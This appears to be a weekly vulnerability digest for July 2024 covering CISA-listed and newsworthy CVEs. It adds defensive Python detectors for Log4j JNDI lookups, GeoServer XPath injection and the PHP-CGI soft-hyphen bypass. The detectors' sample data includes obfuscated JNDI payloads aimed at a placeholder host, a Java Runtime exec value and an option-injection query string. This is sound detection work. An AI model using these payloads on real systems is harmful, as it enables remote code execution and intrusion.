Snapshot
July 13, 2024 - July 19, 2024
CISA Known Exploited Vulnerabilities

| CVE | Summary | Severity | Vendor | Date Added |
|---|---|---|---|---|
| CVE-2024-34102 | Adobe Commerce and Magento Open Source contain an improper restriction of XML external entity reference (XXE) vulnerability that allows for remote code execution. | CRITICAL | Adobe | July 17, 2024 |
| CVE-2024-28995 | SolarWinds Serv-U contains a path traversal vulnerability that allows an attacker to read sensitive files on the host machine. | HIGH | SolarWinds | July 17, 2024 |
| CVE-2022-22948 | VMware vCenter Server contains an incorrect default file permissions vulnerability that allows a remote, privileged attacker to gain access to sensitive information. | MEDIUM | VMware | July 17, 2024 |
| CVE-2024-36401 | OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input. | CRITICAL | OSGeo | July 15, 2024 |
Newswires

Critical Cisco Vulnerability Allows Password Alterations (July 18, 2024)
Cisco has issued a fix for a critical vulnerability, CVE-2024-20419, that allows threat actors to change the password of any user, including administrators.

SolarWinds Patches Eight Critical Vulnerabilities in Access Rights Manager Software (July 18, 2024)
SolarWinds recently addressed eight critical vulnerabilities in its Access Rights Manager (ARM) software.

TAG-100: A New Cyber Threat Actor Leveraging Open-Source Tools for Global Attacks (July 18, 2024)
A new threat actor, tracked as TAG-100, has been observed using open-source tools in a suspected global cyber-espionage campaign.

Critical Vulnerability in Cisco SSM On-Prem Allows Hackers to Alter User Passwords (July 17, 2024)
Cisco has addressed a critical vulnerability in its Smart Software Manager On-Prem (SSM On-Prem) license servers that allowed attackers to change the password of any user, including administrators.

CISA Issues Warning on Active Exploitation of GeoServer GeoTools RCE Vulnerability (July 16, 2024)
CISA has warned of active exploitation of a critical GeoServer GeoTools remote code execution vulnerability, CVE-2024-36401.

Void Banshee APT Exploits Microsoft Zero-Day to Launch Spear-Phishing Attacks (July 16, 2024)
The Void Banshee advanced persistent threat (APT) group has been exploiting the Microsoft MSHTML zero-day CVE-2024-38112 (exploited before Microsoft's July 9, 2024 fix) in a spear-phishing campaign that delivers the Atlantida Stealer malware.

HardBit Ransomware 4.0 Utilizes Passphrase Protection to Elude Detection (July 15, 2024)
Researchers have identified a new version of the HardBit ransomware strain that uses passphrase protection to evade detection and analysis.

Rapid Exploitation of PoC Exploits by Hackers: A Cloudflare Security Report (July 13, 2024)
Cloudflare's 2024 Application Security report reveals that attackers weaponize publicly available proof-of-concept (PoC) exploits as little as 22 minutes after they are released.
Vulnerabilities In The News

| CVE | Summary | Severity | Vendor | Risk Context |
|---|---|---|---|---|
| CVE-2024-20419 (8) | A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem could allow an unauthenticated, remote ... | CRITICAL | Cisco | Actively Exploited |
| CVE-2021-44228 (3) | Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect agai... | CRITICAL | Bentley, Sonicwall, Netapp, Apache, Intel, Siemens, Fedoraproject, Snowsoftware, Cisco, Debian, Percussion | CISA Known Exploited; Actively Exploited; Remote Code Execution; Used In Ransomware; Public Exploits Available |
| CVE-2024-20401 (5) | A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthent... | CRITICAL | Cisco | Remote Code Execution |
| CVE-2024-36401 (5) | GeoServer is an open source server that allows users to share and edit geospatial data. ... | CRITICAL | Geotools, Geoserver, Osgeo | CISA Known Exploited; Actively Exploited; Remote Code Execution; Public Exploits Available |
| CVE-2024-34102 (3) | Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML Extern... | CRITICAL | Adobe | CISA Known Exploited; Remote Code Execution; Public Exploits Available |
| CVE-2024-4577 (2) | In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows ... | CRITICAL | Php, Php Group, Fedoraproject | CISA Known Exploited; Actively Exploited; Remote Code Execution; Used In Ransomware; Public Exploits Available |
| CVE-2024-27198 (2) | In JetBrains TeamCity before 2023.11.4, an authentication bypass allowed admin actions to be performed. | CRITICAL | Jetbrains | CISA Known Exploited; Actively Exploited; Remote Code Execution; Used In Ransomware; Public Exploits Available |
| CVE-2021-40444 (2) | Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. | HIGH | Microsoft | CISA Known Exploited; Actively Exploited; Remote Code Execution; Public Exploits Available |
| CVE-2024-38112 (10) | Windows MSHTML Platform Spoofing Vulnerability | HIGH | Microsoft | CISA Known Exploited; Actively Exploited; Remote Code Execution |
| CVE-2024-28995 (3) | SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow access to read sensit... | HIGH | Solarwinds | CISA Known Exploited; Actively Exploited; Remote Code Execution; Public Exploits Available |
CISA Known Exploited Vulnerabilities
CISA added four vulnerabilities to the known exploited vulnerabilities list.

OSGeo — GeoServer
CVE-2024-36401 / Added: July 15, 2024
CRITICAL | CVSS 9.80 | EPSS score 94.64% | EPSS percentile 99.28
OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input.
In The News
Vulnerabilities receiving the most attention in traditional news media.
CVE-2024-20419
CRITICAL | CVSS 10.00 | EPSS score 0.04% | EPSS percentile 9.33
Risk context: Actively Exploited
Published: July 17, 2024
A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.
CVE-2021-44228
CRITICAL | CVSS 10.00 | EPSS score 97.56% | EPSS percentile 100.00
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution; Used In Ransomware; Public Exploits Available
Published: Dec. 10, 2021
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. |
Vendors Impacted: Bentley, Sonicwall, Netapp, Apache, Intel, Siemens, Fedoraproject, Snowsoftware, Cisco, Debian, Percussion |
Products Impacted: Prime Service Catalog, Cloud Connect, Cloudcenter Cost Optimizer, Crosswork Platform Infrastructure, Sentron Powermanager, Fedora, Packaged Contact Center Enterprise, Audio Development Kit, Data Center Network Manager, Crosswork Zero Touch Provisioning, Firepower 4115, Energy Engage, Vm Access Proxy, Dna Center, Nexus Insights, Unified Sip Proxy, Captial, Cloudcenter, Log4j2, Cloud Insights, E-Car Operation Center, Contact Center Domain Manager, Email Security, Dna Spaces\, Video Surveillance Operations Manager, Navigator, Sensor Solution Firmware Development Kit, Siguard Dsa, Workload Optimization Manager, Advanced Malware Protection Virtual Private Cloud Appliance, Evolved Programmable Network Manager, Siveillance Viewpoint, Firepower 4145, Mindsphere, Snapcenter, System Debugger, Common Services Platform Collector, Mendix, Spectrum Power 4, Unified Contact Center Express, Firepower 4140, Identity Services Engine, Ucs Central, Secure Device Onboard, Firepower 2130, Nx, Intersight Virtual Appliance,... |
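The description above gives the mechanism: any logged string containing a `${jndi:...}` lookup makes log4j-core fetch and load code from an attacker-chosen endpoint while message lookup substitution is enabled. Attackers hide the `jndi` token behind nested lookups (`${lower:j}`, `${::-j}`, the `:-` default-value syntax) so that a plain substring match misses it. The detector below is an added example, not code from this digest or from the Log4j project: it resolves those nesting tricks on the innermost lookup first, then matches the `jndi` prefix. Only the `lower`, `upper` and default-value forms are resolved, which is an assumption about which forms matter; other lookups are replaced by a placeholder. The sample request lines are constructed, and the 203.0.113.x addresses are documentation-range placeholders.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested braces inside the body.
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def normalize_lookups(text: str) -> tuple[str, list[str]]:
    """Resolve nested lookups the way the obfuscation tricks rely on and
    collect every JNDI target that surfaces.

    Returns (normalized_text, jndi_targets).
    """
    # URL-decode first: a lookup in a query string reaches the logger decoded.
    s = unquote(text)
    found: list[str] = []

    def resolve(m: re.Match) -> str:
        inner = m.group(1)
        # ${anything:-default} and ${::-x} evaluate to the default text.
        if ":-" in inner:
            return inner.split(":-", 1)[1]
        prefix, _, rest = inner.partition(":")
        p = prefix.lower()
        if p == "lower":
            return rest.lower()
        if p == "upper":
            return rest.upper()
        if p == "jndi":
            found.append(rest)
            return "<jndi-lookup>"
        # ASSUMPTION: every other lookup (env, sys, date, ...) is benign for
        # this check and is collapsed to a placeholder so the loop terminates.
        return "<" + p + "-lookup>"

    for _ in range(20):  # bound the nesting depth we are willing to unwrap
        new = _LOOKUP.sub(resolve, s)
        if new == s:
            break
        s = new
    return s, found


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line_index, jndi_targets) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        _, targets = normalize_lookups(line)
        if targets:
            hits.append((i, targets))
    return hits


# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://203.0.113.5:1389/a}",
    "GET / HTTP/1.1 User-Agent: ${${lower:j}ndi:${lower:l}dap://203.0.113.5/x}",
    "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1",
    "GET / HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; ${date:yyyy})",
    "GET / HTTP/1.1 User-Agent: curl/8.0",
]

if __name__ == "__main__":
    for idx, targets in scan(SAMPLE_REQUESTS):
        print(f"line {idx}: JNDI lookup -> {targets}")
```

Line 3 of the sample decodes to `${${::-j}${::-n}di:ldap://...}`, which a substring match for `${jndi` never sees; after one pass of innermost resolution it becomes `${jndi:ldap://...}` and is flagged. Line 4 carries a lookup that is not JNDI and stays clean.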
CVE-2024-20401
CRITICAL | CVSS 9.80 | EPSS score 0.04% | EPSS percentile 9.33
Risk context: Remote Code Execution
Published: July 17, 2024
A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system. This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device. Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition. |
CVE-2024-36401
CRITICAL | CVSS 9.80 | EPSS score 94.64% | EPSS percentile 99.28
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution; Public Exploits Available
Published: July 1, 2024
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed. |
Vendors Impacted: Geotools, Geoserver, Osgeo |
Products Impacted: Geotools, Geoserver |
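The advisory text above pins down two things a detection engineer can use: the request types through which the bug is reachable (WFS GetFeature and GetPropertyValue, WMS GetMap, GetFeatureInfo and GetLegendGraphic, WPS Execute), and the sink (property names handed to commons-jxpath, whose extension-function syntax lets an XPath expression call a fully qualified Java class and method). A legitimate property name is a bare attribute name or a short path; a value that names a `java.` package or calls a function is not. The scanner below is an added example, not code from this digest or from GeoServer: it parses access-log request lines, keeps only the request types the advisory lists, and inspects the parameters that carry property names. Which query parameters reach the evaluator is an assumption stated in the code (`valueReference` and `propertyName` are the WFS carriers; the filter parameters are included because filters also reference property names). The sample log lines are constructed, and the JXPath-style payload in the second line is modelled on commons-jxpath's class-and-method call syntax, not copied from any observed exploit.

```python
import re
from urllib.parse import parse_qs, urlsplit

# (SERVICE, REQUEST) pairs the advisory confirms as exploitable.
VULNERABLE_REQUESTS = {
    ("WFS", "GETFEATURE"), ("WFS", "GETPROPERTYVALUE"),
    ("WMS", "GETMAP"), ("WMS", "GETFEATUREINFO"), ("WMS", "GETLEGENDGRAPHIC"),
    ("WPS", "EXECUTE"),
}

# ASSUMPTION: these are the query parameters through which property names
# reach GeoTools' XPath evaluation; the advisory does not list them.
NAME_PARAMS = {"valuereference", "propertyname"}        # bare property names
FILTER_PARAMS = {"cql_filter", "filter"}                 # filters (functions are normal here)

# JXPath extension functions call Java by fully qualified name; a property
# name never legitimately contains a java.* class, exec(, or getRuntime.
JAVA_CALL = re.compile(r"\bjava(x)?\.[\w.]+|\bexec\s*\(|getRuntime", re.I)
# Any function call at all is an anomaly in a bare property-name parameter.
FUNCTION_CALL = re.compile(r"\w+\s*\(")


def inspect_request(request_line: str) -> tuple[str, str]:
    """Classify one 'METHOD target HTTP/x' request line.

    Returns (verdict, detail) with verdict in {ignore, clean, medium, high}.
    """
    try:
        _method, target, _proto = request_line.split(" ", 2)
    except ValueError:
        return ("ignore", "unparseable request line")
    query = urlsplit(target).query
    # parse_qs percent-decodes values; OGC parameter names are case-insensitive.
    params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
    service = params.get("service", [""])[0].upper()
    request = params.get("request", [""])[0].upper()
    if (service, request) not in VULNERABLE_REQUESTS:
        return ("ignore", f"{service} {request}".strip())
    for name in sorted(NAME_PARAMS | FILTER_PARAMS):
        for value in params.get(name, []):
            if JAVA_CALL.search(value):
                return ("high", f"{name}={value}")
            if name in NAME_PARAMS and FUNCTION_CALL.search(value):
                return ("medium", f"{name}={value}")
    return ("clean", f"{service} {request}")


def scan_log(lines: list[str]) -> list[tuple[int, str, str]]:
    """Return (index, verdict, detail) for every line rated medium or high."""
    hits = []
    for i, line in enumerate(lines):
        verdict, detail = inspect_request(line)
        if verdict in ("medium", "high"):
            hits.append((i, verdict, detail))
    return hits


# Constructed sample access-log request lines (not real traffic).
SAMPLE_LOG = [
    "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=topp:states&valueReference=STATE_NAME HTTP/1.1",
    "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=topp:states&valueReference=exec(java.lang.Runtime.getRuntime(),%27id%27) HTTP/1.1",
    "GET /geoserver/wms?SERVICE=WMS&REQUEST=GetMap&LAYERS=topp:states&CQL_FILTER=INTERSECTS(the_geom,POINT(1%202)) HTTP/1.1",
    "GET /geoserver/wfs?service=WFS&request=GetCapabilities HTTP/1.1",
]

if __name__ == "__main__":
    for idx, verdict, detail in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {verdict.upper()} {detail}")
```

The CQL filter in the third line contains function calls (`INTERSECTS`, `POINT`) and is rated clean, because functions are ordinary in filters; the same text in `valueReference` would be rated medium. POST bodies carrying the equivalent XML requests are not covered by this GET-only parser.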
CVE-2024-34102
CRITICAL | CVSS 9.80 | EPSS score 97.32% | EPSS percentile 99.89
Risk context: CISA Known Exploited; Remote Code Execution; Public Exploits Available
Published: June 13, 2024
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. |
Vendor Impacted: Adobe |
Products Impacted: Commerce Webhooks, Magento, Commerce, Commerce And Magento Open Source |
CVE-2024-4577
CRITICAL | CVSS 9.80 | EPSS score 96.75% | EPSS percentile 99.69
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution; Used In Ransomware; Public Exploits Available
Published: June 9, 2024
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20 and 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may apply "Best-Fit" behavior to replace characters in the command line passed to Win32 API functions. The PHP CGI module may then misinterpret those characters as PHP options, which may allow a malicious user to pass options to the PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, and so on.
Vendors Impacted: Php, Php Group, Fedoraproject |
Products Impacted: Php, Fedora |
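The description above explains the failure mode: the CGI argument vector built from the query string is checked for option characters before the Windows code-page conversion runs, so a non-ASCII byte that best-fits to `-` passes the check and still reaches php-cgi as an option. The model below is an added example, not code from this digest or from PHP: it reproduces the CGI argv split (a query string without an unencoded `=` is split on `+`, per RFC 3875 section 4.4), applies a best-fit mapping, and contrasts a guard that looks for a literal `-` with one that checks what the argument becomes after mapping. Assumptions: only the soft hyphen (byte 0xAD mapped to `-`) is modelled, which is the substitution publicly associated with this CVE; the real best-fit tables are larger and code-page specific, which is why the hardened guard also rejects any non-ASCII byte in argv. The sample queries are constructed.

```python
from urllib.parse import unquote_to_bytes

# ASSUMPTION: one best-fit substitution, soft hyphen (0xAD) -> '-' (0x2D).
# Windows' real tables map many more characters and differ per code page.
BEST_FIT = {0xAD: 0x2D}


def cgi_argv(query: str) -> list[bytes]:
    """Build the CGI script argument vector from a raw query string.

    RFC 3875 section 4.4: only a query string with no unencoded '=' is
    treated as a command line; it is split on '+' and each piece is
    percent-decoded. Anything with '=' is ordinary form data and yields no argv.
    """
    if "=" in query:
        return []
    return [unquote_to_bytes(piece) for piece in query.split("+")]


def apply_best_fit(arg: bytes) -> bytes:
    """Model the code-page conversion the OS applies to the command line."""
    return bytes(BEST_FIT.get(b, b) for b in arg)


def effective_argv(query: str) -> list[bytes]:
    """What php-cgi actually sees: argv after best-fit conversion."""
    return [apply_best_fit(a) for a in cgi_argv(query)]


def naive_guard(query: str) -> bool:
    """Vulnerable check: rejects options by looking for a literal '-' before
    conversion, so 0xAD 'd' looks harmless."""
    return any(a.startswith(b"-") for a in cgi_argv(query))


def hardened_guard(query: str) -> bool:
    """Reject an argument that becomes an option after best-fit, or that
    contains any non-ASCII byte, since those are the bytes conversion may rewrite."""
    for a in cgi_argv(query):
        if apply_best_fit(a).startswith(b"-") or any(b > 0x7F for b in a):
            return True
    return False


def guard_results(query: str) -> tuple[bool, bool]:
    """(naive_blocks, hardened_blocks) for one query string."""
    return naive_guard(query), hardened_guard(query)


# Constructed sample query strings (not observed traffic).
SAMPLE_QUERIES = {
    "benign search terms": "search+terms",
    "plain -s option (CVE-2012-1823 style)": "-s",
    "soft-hyphen -s option": "%ADs",
    "soft-hyphen -d ini override": "%ADd+allow_url_include%3d1",
    "ordinary form data (no argv)": "page=1&id=2",
}

if __name__ == "__main__":
    for label, q in SAMPLE_QUERIES.items():
        naive, hard = guard_results(q)
        print(f"{label:40} argv={effective_argv(q)!r:45} naive={naive} hardened={hard}")
```

`%3d` inside an argument decodes to `=` only after the split, so `allow_url_include%3d1` survives as a single argv element and `-d` makes php-cgi read it as an ini directive; the literal-`-` check never fires because the byte it would need to see does not exist until the OS converts the command line.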
CVE-2024-27198
CRITICAL | CVSS 9.80 | EPSS score 97.16% | EPSS percentile 99.83
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution; Used In Ransomware; Public Exploits Available
Published: March 4, 2024
In JetBrains TeamCity before 2023.11.4, an authentication bypass allowed an unauthenticated attacker to perform admin actions.
Vendor Impacted: Jetbrains |
Product Impacted: Teamcity |
CVE-2021-40444
HIGH | CVSS 8.80 | EPSS score 96.91% | EPSS percentile 99.74
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution; Public Exploits Available
Published: Sept. 15, 2021
Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs. Please see the Mitigations and Workaround sections for important information about steps you can take to protect your system from this vulnerability. UPDATE September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Sec...
Vendor Impacted: Microsoft |
Products Impacted: Windows Server 2022, Windows Server 2012, Windows Server 2019, Windows 10, Windows 8.1, Windows 7, Windows Server 2016, Windows Server 2008, Windows Rt 8.1, Mshtml |
CVE-2024-38112
HIGH | CVSS 7.50 | EPSS score 1.61% | EPSS percentile 87.60
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution
Published: July 9, 2024
Windows MSHTML Platform Spoofing Vulnerability
Vendor Impacted: Microsoft |
Products Impacted: Windows Server 2022, Windows 11 22h2, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2008, Windows 10 1607, Windows 10 22h2, Windows 11 23h2, Windows Server 2022 23h2, Windows 10 1809, Windows 10 1507, Windows, Windows 10 21h2, Windows 11 21h2 |
CVE-2024-28995
HIGH | CVSS 7.50 | EPSS score 96.00% | EPSS percentile 99.51
Risk context: CISA Known Exploited; Actively Exploited; Remote Code Execution; Public Exploits Available
Published: June 6, 2024
SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow access to read sensitive files on the host machine.
Vendor Impacted: Solarwinds |
Product Impacted: Serv-U |